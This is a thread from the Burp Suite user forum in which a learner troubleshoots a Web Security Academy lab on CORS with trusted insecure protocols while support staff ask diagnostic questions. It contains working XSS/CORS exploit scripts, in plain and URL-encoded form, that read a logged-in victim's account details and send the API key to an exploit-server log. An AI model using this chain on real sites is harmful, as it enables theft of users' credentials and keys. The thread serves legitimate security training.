Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: CORS vulnerability with trusted insecure protocols - exploit works in my browser (Chrome) but not when deliver to vitim

Lorenzo | Last updated: Jul 27, 2024 05:58PM UTC

Hi, I have a problem in the context of laboratory "Lab: CORS vulnerability with trusted insecure protocols". The problem is as follows: I rolled my own payload to be delivered to the victim. The payload is: <script> fetch('https://0a2000fd0316619e81a34ded0063007f.web-security-academy.net/accountDetails', { method: 'GET', credentials: 'include' }).then(response => response.json()).then(data => fetch('https://exploit-0a3c0094036561db811f4cf901b80068.exploit-server.net/log?key=' + data.apikey));</script> I URL-encoded the above payload and then I inserted it into the subdomain to redirect the victim as follows: <script> document.location="https://stock.0a2000fd0316619e81a34ded0063007f.web-security-academy.net/?productId=4%3c%73%63%72%69%70%74%3e%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%30%61%32%30%30%30%66%64%30%33%31%36%36%31%39%65%38%31%61%33%34%64%65%64%30%30%36%33%30%30%37%66%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%61%63%63%6f%75%6e%74%44%65%74%61%69%6c%73%27%2c%20%7b%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%20%63%72%65%64%65%6e%74%69%61%6c%73%3a%20%27%69%6e%63%6c%75%64%65%27%7d%29%2e%74%68%65%6e%28%72%65%73%70%6f%6e%73%65%3d%3e%72%65%73%70%6f%6e%73%65%2e%6a%73%6f%6e%28%29%29%2e%74%68%65%6e%28%64%61%74%61%20%3d%3e%20%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%33%63%30%30%39%34%30%33%36%35%36%31%64%62%38%31%31%66%34%63%66%39%30%31%62%38%30%30%36%38%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%6b%65%79%3d%27%2b%64%61%74%61%2e%61%70%69%6b%65%79%29%29%3b%3c%2f%73%63%72%69%70%74%3e&storeId=1" </script> When I click on "view exploit" my payload seems to be working fine because it shows in the exploit server log the request with the API key, as you can see in the image: https://ibb.co/2NjsZ2n The problem is that when I deliver it to the victim, even though the exploit server log shows that the victim has accessed /exploit directory, it do not show his APIkey. What am I doing wrong? Thank you very much.

Ben, PortSwigger Agent | Last updated: Jul 28, 2024 03:40PM UTC

Hi, Which browser are you using when you attempt this lab?

Lorenzo | Last updated: Jul 29, 2024 09:16AM UTC

Hi, The browser that I'm using is google chrome.

Ben, PortSwigger Agent | Last updated: Jul 29, 2024 09:25AM UTC

Hi Lorenzo, Do you have issues using the official written solution as well?

Lorenzo | Last updated: Jul 29, 2024 10:01AM UTC

Hi, yes, the same behaviour happens with the official solution. The steps that I used are the same for my own custom one: I took the official solution (with the right URL substitution): <script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a9600c0031f1d1a86e1d90d006200b1.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a86008f03a31d4f866ad86301e60015.exploit-server.net/log?key='+this.responseText; };</script> Then I URL encoded it and put it in the payload to be hosted on the exploit server: <script> document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4%3c%73%63%72%69%70%74%3e%76%61%72%20%72%65%71%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%20%72%65%71%2e%6f%6e%6c%6f%61%64%20%3d%20%72%65%71%4c%69%73%74%65%6e%65%72%3b%20%72%65%71%2e%6f%70%65%6e%28%27%67%65%74%27%2c%27%68%74%74%70%73%3a%2f%2f%30%61%39%36%30%30%63%30%30%33%31%66%31%64%31%61%38%36%65%31%64%39%30%64%30%30%36%32%30%30%62%31%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%61%63%63%6f%75%6e%74%44%65%74%61%69%6c%73%27%2c%74%72%75%65%29%3b%20%72%65%71%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%20%3d%20%74%72%75%65%3b%72%65%71%2e%73%65%6e%64%28%29%3b%66%75%6e%63%74%69%6f%6e%20%72%65%71%4c%69%73%74%65%6e%65%72%28%29%20%7b%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%38%36%30%30%38%66%30%33%61%33%31%64%34%66%38%36%36%61%64%38%36%33%30%31%65%36%30%30%31%35%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%6b%65%79%3d%27%2b%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%20%7d%3b%3c%2f%73%63%72%69%70%74%3e%0a&storeId=1" </script> The result is that my access are logged but when I send it to the victim it doesn't record his credentials, as can be seen in the following image: https://ibb.co/vk1GcWX Thank you very much for you support.

Michelle, PortSwigger Agent | Last updated: Jul 30, 2024 02:30PM UTC

Hi Thanks for sending the screenshot over. Can I confirm which version of Chrome you're using when you're working on this lab, please?

Lorenzo | Last updated: Jul 30, 2024 02:46PM UTC

Hi, the version is "Version 127.0.6533.72 (Official Build) (64-bit)". If you need more information, feel free to ask. Thank you very much for you patience.

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:51PM UTC

Hi Thanks for the update. We'll do some more checks and be in touch soon.

Michelle, PortSwigger Agent | Last updated: Aug 02, 2024 02:07PM UTC

Hi Thanks for your patience. Just to let you know we're still looking into this, but the issue seems to just exist when you test the exploit on yourself using 'View Exploit'. If you deliver the exploit to the victim and check the access logs, you should see the victim in the exploit server logs.

Lorenzo | Last updated: Aug 03, 2024 09:07AM UTC

Hi, Yes, I see the victim but without the information about the credentials, as if the payload won't run on the victim browser (as you can see by the images in the posts above). Regards, Lorenzo.

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 12:15PM UTC

Hi Were you still logged into the lab with your own account at the stage where you delivered the exploit to the victim and checked the access logs?

Lorenzo | Last updated: Aug 06, 2024 08:15PM UTC

Yes, I was logged in with the account wiener:peter. Thanks.

Michelle, PortSwigger Agent | Last updated: Aug 07, 2024 09:19AM UTC

If you try delivering the attack to the victim again, does the same thing happen?

Lorenzo | Last updated: Aug 07, 2024 10:21AM UTC

Hi, I logged in with wiener:peter and used the same payload as described in my first post (the payload I rolled by myself). The result is that when I click on "view exploit" and try it on myself I see the api key, but if I deliver it to the victim I still only see that the victim access the /exploit directory but it is like my payload doesn't trigger. In the following screenshot there's what I see in the access log https://ibb.co/nqX3RvH. NOTE: in the screenshot above the highlighted row is the result of me clicking on "View Exploit". I also tried to use the official solution to see if I could solve with it with the official solution but it still doesn't work, as can be seen by the screenshot https://ibb.co/n3q7dMH. NOTE: The highlighted row is the result of me clicking on "View Exploit". To have a better understanding of the problem I'm available on teams/discord or whatever program you like to show you the step-by-step solution I give to the lab. Alternatively, I can upload a short video to do it. Please, let me know. This is the only lab that I need to solve to complete the Practitioner level. Regards.

Michelle, PortSwigger Agent | Last updated: Aug 07, 2024 12:17PM UTC

Hi if you could email a screen recording to support@portswigger.net so i can compare everything to the steps we're taking here, that would be great :)

Lorenzo | Last updated: Aug 07, 2024 06:07PM UTC

Hi, I sent you an email. Thank you very much.

Dominyque, PortSwigger Agent | Last updated: Aug 08, 2024 06:43AM UTC